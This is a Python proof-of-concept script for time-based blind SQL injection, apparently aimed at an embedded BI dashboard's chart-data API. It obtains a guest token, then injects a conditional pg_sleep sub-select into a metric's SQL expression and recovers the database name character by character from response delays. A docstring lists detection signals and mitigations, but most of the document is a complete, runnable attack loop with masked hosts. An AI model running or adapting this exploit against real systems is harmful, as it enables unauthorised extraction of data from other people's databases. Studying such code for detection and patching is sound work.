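"""Proof-of-concept: time-based blind SQL injection via an ad-hoc SQL metric.

The script first obtains a dashboard guest token, then repeatedly posts a
chart-data request whose metric ``sqlExpression`` is replaced by a sub-select
that calls ``pg_sleep`` only when one character of ``current_database()``
equals a candidate value. Response latency is the only signal used.

The request shape (guest-token header, ``slice_id``, ``form_data``,
``viz_type``) resembles an embedded BI dashboard API; the product is not named
on the page, so that is an inference. All hosts are masked with ``x``; one
``Host`` header and one colour-scheme name that the page left unmasked are
masked here in the same way.

What a defender can take from it:

* Root cause (as far as the payload shows): a guest/embedded session may
  submit its own SQL expression for a metric instead of being limited to the
  saved chart definition.
* Detection: bursts of near-identical chart-data POSTs from one guest token
  that differ only in ``sqlExpression``; ``pg_sleep``/``ASCII``/``SUBSTRING``
  inside metric expressions; response times clustering at whole seconds;
  slow statements in PostgreSQL logs (``log_min_duration_statement``).
* Mitigation: reject guest-session payloads that differ from the stored
  chart, disallow sub-selects in ad-hoc expressions, run dashboard queries
  under a least-privilege role with ``statement_timeout`` set, and rate-limit
  the chart-data endpoint per token.
"""

import copy
import json
import os
import string
import time

import requests

# Candidate code points tried at each position. The trailing 0 is a sentinel:
# reaching it means every printable character was tried without a match.
printable_chars = list(map(ord, string.printable)) + [0]
dashboard_token = None   # guest token, filled in by getSetToken()
extracted = ''           # characters recovered so far
default_time = 2         # seconds of injected delay, also the match threshold
patokan_karakter = 1     # 1-based index of the character currently tested


def getSetToken():
    """Request a dashboard token and store it in the global ``dashboard_token``.

    Posts an empty JSON body to the (masked) token endpoint with a bearer
    credential. On HTTP 200 the token is read from ``data.dashboardToken`` of
    the JSON response; on any other status the global is left unchanged.
    Request and decode errors are printed, not raised.
    """
    global dashboard_token

    url = "https://xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx/xxx/v1/xxxxxxxx/xxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxxxx"
    headers = {
        # The page lost the closing quote and comma of this masked value.
        "Host": "xxxxxxxxxxxxxxxxxxxxxx",
        "Sec-Ch-Ua-Platform": '"macOS"',
        # Credential embedded in source (masked on the page).
        "Authorization": "Bearer xxxxxxxxxxxxx",
        "Accept-Language": "en-US,en;q=0.9",
        "Sec-Ch-Ua": '"Chromium";v="135", "Not-A.Brand";v="8"',
        "Content-Type": "application/json",
        "Sec-Ch-Ua-Mobile": "?0",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36",
        "Accept": "*/*",
        "Origin": "https://xxxxxxxxxxxxxxxxxxxxxx",
        "Sec-Fetch-Site": "same-site",
        "Sec-Fetch-Mode": "cors",
        "Sec-Fetch-Dest": "empty",
        "Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/",
        "Priority": "u=1, i",
    }
    payload = {}

    try:
        response = requests.post(url, headers=headers, json=payload)
        if response.status_code == 200:
            try:
                response_data = response.json()
                dashboard_token = response_data.get("data", {}).get("dashboardToken")
            except json.JSONDecodeError as e:
                print(e)
            except requests.exceptions.RequestException as e:
                print(e)
    except requests.exceptions.RequestException as e:
        print(e)


def doExtraction():
    """Run the timing loop against the (masked) chart-data endpoint.

    For each character position, every value in ``printable_chars`` is placed
    in a conditional ``pg_sleep`` sub-select sent as the metric's
    ``sqlExpression``. A 200 response that took at least ``default_time``
    seconds is treated as a match; the character is appended to ``extracted``
    and the position advances. The function never returns: the ``finally``
    clause prints ``extracted`` and terminates the process.
    """
    global dashboard_token, default_time, patokan_karakter, extracted

    base_url = "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx"
    query_params = {
        "form_data": json.dumps({"slice_id": 241}),
        "dashboard_id": "40",
        "force": None,
    }
    headers = {
        # Masked like the other hosts; the page showed a real host name here.
        "Host": "xxxxxxxxxxxxxxxxxxxxxx",
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:138.0) Gecko/20100101 Firefox/138.0",
        "Accept": "application/json",
        "Accept-Language": "en-US,en;q=0.5",
        "Accept-Encoding": "gzip, deflate, br",
        "Referer": "https://xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx/xxxxxxxxxxxxxxxxxxxxxx",
        "X-Csrftoken": "",
        # Guest token: the only credential presented with the query payload.
        "X-Guesttoken": dashboard_token,
        "Content-Type": "application/json",
        "Origin": "https://xxxxxxxxxxxxxxxxxxxxxx",
        "Sec-Fetch-Dest": "empty",
        "Sec-Fetch-Mode": "same-origin",
        "Sec-Fetch-Site": "same-origin",
    }

    # Chart-data request body as captured from the dashboard. The empty
    # "sqlExpression" of the first metric is the field overwritten per request.
    template = {
        "datasource": {"id": 50, "type": "table"},
        "force": False,
        "queries": [{
            "filters": [
                {"col": "transaction_date", "op": "TEMPORAL_RANGE", "val": "No filter"},
                {"col": "doc_type", "op": "==", "val": "INV"},
            ],
            "extras": {"having": "", "where": ""},
            "applied_time_extras": {},
            "columns": [],
            "metrics": [{
                "aggregate": None,
                "column": None,
                "datasourceWarning": True,
                "expressionType": "SQL",
                "hasCustomLabel": True,
                "label": "total_penjualan",
                "optionName": "metric_26ts8mn0vq5_t0crgans0e",
                "sqlExpression": "",
            }],
            "orderby": [[
                {
                    "aggregate": None,
                    "column": None,
                    "datasourceWarning": True,
                    "expressionType": "SQL",
                    "hasCustomLabel": True,
                    "label": "total_penjualan",
                    "optionName": "metric_26ts8mn0vq5_t0crgans0e",
                    "sqlExpression": "coalesce(SUM(penjualan), 0)",
                },
                False,
            ]],
            "annotation_layers": [],
            "row_limit": 10000,
            "series_limit": 0,
            "order_desc": True,
            "url_params": {
                "?uiConfig": "10",
                "days": "14",
                "endDate": "2025-05-14T16:59:59.059Z",
                "expand_filters": "false",
                "startDate": "2025-04-30T17:00:00.000Z",
                "uiConfig": "11",
            },
            "custom_params": {},
            "custom_form_data": {},
        }],
        "form_data": {
            "datasource": "50__table",
            "viz_type": "handlebars",
            "slice_id": 241,
            "url_params": {
                "?uiConfig": "10",
                "days": "14",
                "endDate": "2025-05-14T16:59:59.059Z",
                "expand_filters": "false",
                "startDate": "2025-04-30T17:00:00.000Z",
                "uiConfig": "11",
            },
            "query_mode": "aggregate",
            "groupby": [],
            "metrics": [{
                "aggregate": None,
                "column": None,
                "datasourceWarning": True,
                "expressionType": "SQL",
                "hasCustomLabel": True,
                "label": "total_penjualan",
                "optionName": "metric_26ts8mn0vq5_t0crgans0e",
                "sqlExpression": "coalesce(SUM(penjualan), 0)",
            }],
            "all_columns": [],
            "percent_metrics": [],
            "order_by_cols": [],
            "order_desc": True,
            "row_limit": 10000,
            "server_page_length": 10,
            "adhoc_filters": [
                {
                    "clause": "WHERE",
                    "comparator": "No filter",
                    "datasourceWarning": False,
                    "expressionType": "SIMPLE",
                    "filterOptionName": "filter_vztukh6q0g_sq1zlze9z5",
                    "isExtra": False,
                    "isNew": False,
                    "operator": "TEMPORAL_RANGE",
                    "sqlExpression": None,
                    "subject": "transaction_date",
                },
                {
                    "clause": "WHERE",
                    "comparator": "INV",
                    "datasourceWarning": False,
                    "expressionType": "SIMPLE",
                    "filterOptionName": "filter_qzite23eqyf_csg3677vtr",
                    "isExtra": False,
                    "isNew": False,
                    "operator": "==",
                    "operatorId": "EQUALS",
                    "sqlExpression": None,
                    "subject": "doc_type",
                },
            ],
            # The HTML tags that wrapped this expression appear to have been
            # stripped when the page was extracted; only the text survives.
            "handlebarsTemplate": "\n{{formatCurrency data.[0].[total_penjualan] code='IDR' locale=\"id\"}}\n",
            "styleTemplate": "/*\n .data-list {\n background-color: yellow;\n }\n*/\n{{data.[0].[SUM(penjualan)]}}",
            "dashboards": [40],
            "extra_form_data": {},
            "label_colors": {},
            "shared_label_colors": {},
            # Vendor-specific prefix masked, consistent with the masked hosts.
            "color_scheme": "xxxxxxx_v2_dashboard",
            "extra_filters": [],
            "dashboardId": 40,
            "force": None,
            "result_format": "json",
            "result_type": "full",
        },
        "result_format": "json",
        "result_type": "full",
    }

    dict_template = copy.deepcopy(template)
    character_found = False
    # Counted across the whole run. The page reset this to 0 on every request,
    # so the "> 5" cap below could never trigger and a persistently rejected
    # token led to unbounded token requests.
    auth_failures = 0

    try:
        while True:
            for char in printable_chars:
                if char == 0:
                    print(f"[!] end of position {patokan_karakter}")
                    # Not handled by any except clause below, so control goes
                    # straight to ``finally`` and the run ends. (The page had
                    # the typo ``StopIteratio``.)
                    raise StopIteration

                # Conditional delay: the database sleeps only when the tested
                # character of current_database() equals the candidate.
                payload = f"(SELECT pg_sleep({default_time}) WHERE ASCII(SUBSTRING(current_database(),{patokan_karakter},1)) = {char})"
                dict_template["queries"][0]["metrics"][0]["sqlExpression"] = payload

                start_time = time.time()
                response = requests.post(base_url, params=query_params, headers=headers, json=dict_template)
                end_time = time.time()
                duration = end_time - start_time

                if response.status_code in [401, 403]:
                    auth_failures += 1
                    if auth_failures > 5:
                        print("[!] Too many auth failures")
                        os._exit(1337)
                    getSetToken()
                    continue

                print(f"[*] patokan = {patokan_karakter}. [*] karakter hex('{hex(char)}'). [*] karakter ascii('{char}'). [*] takes = {duration:.2f} detik. [*] default_time = {default_time}.")

                if duration >= default_time:
                    if response.status_code == 200:
                        print(f"[+] {patokan_karakter} = '{chr(char)}'")
                        extracted += chr(char)
                        default_time = 2
                        character_found = True
                        patokan_karakter += 1
                        break
                    else:
                        # Slow but non-200 response: treated as fatal.
                        os._exit(1337)
                character_found = False

            if not character_found:
                default_time += 1
                if default_time > 10:
                    print(f"[+] extracted = {extracted}")
                    break
            elif patokan_karakter > 256:
                # Hard upper bound on the number of positions examined.
                print(f"[+] extracted = {extracted}")
                os._exit(1337)
    except requests.exceptions.HTTPError as http_err:
        print(http_err)
        dashboard_token = None
        os._exit(1337)
    except requests.exceptions.RequestException as e:
        print(e)
        dashboard_token = None
        os._exit(1337)
    except json.JSONDecodeError:
        dashboard_token = None
        os._exit(1337)
    finally:
        # Runs on every exit path from the try block, including the sentinel.
        print(f"[+] extracted = {extracted}")
        os._exit(1337)


if __name__ == "__main__":
    getSetToken()
    doExtraction()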